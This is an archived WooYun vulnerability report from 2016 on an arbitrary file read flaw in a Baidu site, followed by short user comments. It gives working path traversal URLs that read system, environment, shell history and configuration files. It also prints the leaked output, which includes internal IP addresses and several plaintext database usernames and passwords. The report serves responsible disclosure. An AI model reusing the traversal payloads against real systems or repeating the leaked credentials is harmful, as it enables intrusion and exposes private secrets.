破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

百度某站点任意文件遍历(泄漏多个数据库帐号密码)

编号190419
Urlhttp://www.wooyun.org/bug.php?action=view&id=190419
漏洞状态厂商已经确认
漏洞标题百度某站点任意文件遍历(泄漏多个数据库帐号密码)
漏洞类型任意文件遍历/下载
厂商百度
白帽子lijiejie
提交日期2016-03-29 16:02:00
公开日期2016-05-13 20:00:00
修复时间(not set)
确认时间2016-03-29 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank12
厂商评级
厂商评rank15
漏洞简介
百度某站点任意文件遍历(泄漏数据库帐号密码等)
漏洞细节

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1


可以读取任意本地文件。

dz.baidu.com.png

POC

DEVICE=eth1
BOOTPROTO=static
IPADDR=10.26.186.23
NETMASK=255.255.255.0
ONBOOT=yes


得到IP地址是10.26.186.23。再读取/proc/self/environ:

MANPATH=:/usr/share/baidu/man
HOSTNAME=tc-dev-light01.tc.baidu.com
TERM=linux
SHELL=/bin/bash
HISTSIZE=1000
SSH_CLIENT=10.48.50.43 43745 22
SSH_TTY=/dev/pts/0
USER=work
LD_LIBRARY_PATH=/home/op/opbin/optool/lib:
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
SUDO_USER=zhaojianqi
SUDO_UID=194560
OPHOME=/home/op
OPTOOL=/home/op/opbin/optool
MAIL=/var/spool/mail/zhaojianqi
PATH=/home/op/opbin/optool/bin:/home/op/opbin/optool/bin:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/share/baidu/bin:/opt/bin:/home/opt/bin:/DoorGod/bin:/opt/bin:/home/opt/bin
PWD=/home/work/php/sbin
INPUTRC=/etc/inputrc
EDITOR=vim
LANG=en_US
SUDO_COMMAND=/bin/bash
SHLVL=5
HOME=/home/work
LOGNAME=work
SSH_CONNECTION=10.48.50.43 43745 10.26.186.13 22
LESSOPEN=|/usr/bin/lesspipe.sh %s
PKG_CONFIG_PATH=/home/op/opbin/optool/lib/pkgconfig:/home/op/opbin/optool/lib/pkgconfig:
SUDO_GID=100000
G_BROKEN_FILENAMES=1
_=/home/work/php/bin/php-cgi
FPM_SOCKETS=/home/work/php/tmp/php-fpm.sock


得到主机名: HOSTNAME=tc-dev-light01.tc.baidu.com。.bash_history文件是存在的:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/.bash_history


历史命令泄漏了MySQL密码:

/home/work/mysql/bin/mysql -hsh01-dba-chunlei-lapp-01.sh01 -P5100 -pGOGZ7Wpr8wrjHS6g -Dlightpay -ulightpay_r  --default-character-set=utf8


源代码中还泄漏了数据库配置信息,有较多的数据库密码:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/phpui/conf/bdDBProxyConfig.class.php
/**
* DBProxy集群的机器列表、访问集群时所用的用户名、密码、端口号、失败重试次数
* @var array
*/
static $arrDBProxyServer = array(
self::DBPROXY_OPENPLATFORM_INDEX => array( //open-platform dbproxy集群
'username' => 'developer_w',
'password' => 'v60KOStx8cMQrv60',
'port' => 6014,
'jx' => array(
'10.46.7.20',
'10.46.7.20',
),
'tc' => array(
'10.42.8.18',
'10.42.8.18',
),
),
self::DBPROXY_OPENPLATFORM_READONLY_INDEX => array( //open-platform dbproxy集群
'username' => 'openplatform_r',
'password' => 'oY3DHhmW1BFfkUYy',
'port' => 5352,
'jx' => array(
'10.202.95.49',
),
'tc' => array(
'10.202.95.49',
),
),
其余省略

修复方案

正确处理path

状态信息 2016-03-29: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开
厂商回复感谢对百度安全的关注
回应信息危害等级:高漏洞Rank:15 确认时间:2016-03-29 19:53
Showing 1-12 of 12 items.
评论内容评论人点赞数评论时间

李姐姐好棒。

雅柏菲卡02016-03-29 18:11:00

李姐姐开挂了。。

随风的风02016-03-29 16:51:00

开挂了今天

Arrow02016-03-29 16:44:00

必有神器出世

JutaZ02016-03-29 16:37:00

lijiejie进入开挂模式了

习总夸我好青年02016-03-29 16:34:00

越来越看不懂了,什么奇葩都有

举起手来02016-03-29 16:12:00

加入tangscan豪华套餐

浩天02016-03-29 16:12:00

lijiejie进入开挂模式了

netwind02016-03-29 16:11:00

看标题就好厉害啊

带我玩02016-03-29 16:09:00

这是为啥,为啥啊??

疯狗02016-03-29 16:09:00

看标题就好厉害啊

猪猪侠02016-03-29 16:08:00

这节奏就是快啊

Looke02016-03-29 16:08:00